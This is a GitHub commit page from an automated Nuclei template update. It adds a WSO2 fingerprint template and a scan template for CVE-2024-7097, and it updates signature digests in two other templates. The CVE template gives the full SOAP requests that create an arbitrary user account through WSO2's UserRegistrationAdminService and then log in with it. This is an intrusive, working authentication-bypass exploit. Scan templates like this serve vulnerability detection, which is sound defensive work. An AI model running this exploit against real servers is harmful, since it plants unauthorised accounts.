Skip to content

Commit

Permalink
Auto Update Nuclei [Sat Jan 18 06:25:06 UTC 2025] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Jan 18, 2025
1 parent b7d75e3 commit f4b3ce7
Show file tree
Hide file tree
Showing 4 changed files with 97 additions and 2 deletions.
2 changes: 1 addition & 1 deletion plugins/adobe/experience_manager/CVE-2019-16469.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -57,4 +57,4 @@ http:
- type: status
status:
- 200
# digest: 490a00463044022060dba35fa5421084e170227cc4ccfff596fafe5a4497d9bf5055a4134adfe1bd022013bc9c233d7cbf6d1e3a45b6f9b9fc05f70125573af93c735f2ac58702427c0c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a7999220161628c654b798c14f042bb9f99603e93d1b491ad9c0e823686efd03022004fc35d6c5fbdc1f7b57552368ba491ea17e449d55f5d07795e97d875813ebd4:922c64590222798bb761d5b6d8e72950
2 changes: 1 addition & 1 deletion plugins/apache/solr/CVE-2024-45216.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100c1d6557dc8b354f206a2a7c9f8abc58efb125ebc63551ff33a0ecf25409111a702207a4e1ad85dcd8dc2389b568cff5e9e0510615eb2f88bb0a996e57330c45aa21c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f9719bf1843ff17a4bc37895a1d844708807d17b3ba86a9ffb070dc7cdaf524d02210081ec4e8c91b1bd6920911950aed2e3d911ec7f05a2babc75ddf77090036c38c7:922c64590222798bb761d5b6d8e72950
75 changes: 75 additions & 0 deletions plugins/wso2/wso2/CVE-2024-7097.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,75 @@
id: CVE-2024-7097

info:
name: WSO2 User Registration - Arbitrary Account Creation
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
reference:
- https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
metadata:
verified: true
max-request: 2
shodan-query: "WSO2 Carbon Server"
tags: cve,cve2024,wso2,intrusive,auth-bypass

variables:
username: "{{randstr_1}}"
password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
- raw:
- |
POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
Host: {{Hostname}}
SOAPAction: "urn:addUser"
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://org.apache.axis2/xsd">
<soapenv:Header/>
<soapenv:Body>
<xsd:addUser>
<xsd:user>
<xsd:userName>{{username}}</xsd:userName>
<xsd:password>{{password}}</xsd:password>
</xsd:user>
</xsd:addUser>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: status
status:
- 202
internal: true

- raw:
- |
POST /services/AuthenticationAdmin HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:aut="http://authentication.services.core.carbon.wso2.org">
<soapenv:Header/>
<soapenv:Body>
<aut:login>
<aut:username>{{username}}</aut:username>
<aut:password>{{password}}</aut:password>
</aut:login>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
words:
- "loginResponse"
- "<ns:return>true</ns:return>"
condition: and
# digest: 4a0a00473045022100a329adb144a01bd414cbf48754c7aec71dbb4db306c5a4f4a544616bab1f414402201aae5ae006320958b435bd6f02e62eb5bc3ecc3881411b2c6a9817fd0d5ed10a:922c64590222798bb761d5b6d8e72950
20 changes: 20 additions & 0 deletions web-fingerprint/wso2/wso2.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: wso2
info:
name: wso2
author: cn-kali-team
tags: detect,tech,wso2
severity: info
metadata:
product: wso2
shodan-query:
- wso2 carbon server
vendor: wso2
verified: true
http:
- method: GET
path:
- '{{BaseURL}}/'
matchers:
- type: word
words:
- wso2 carbon server

0 comments on commit f4b3ce7

Please sign in to comment.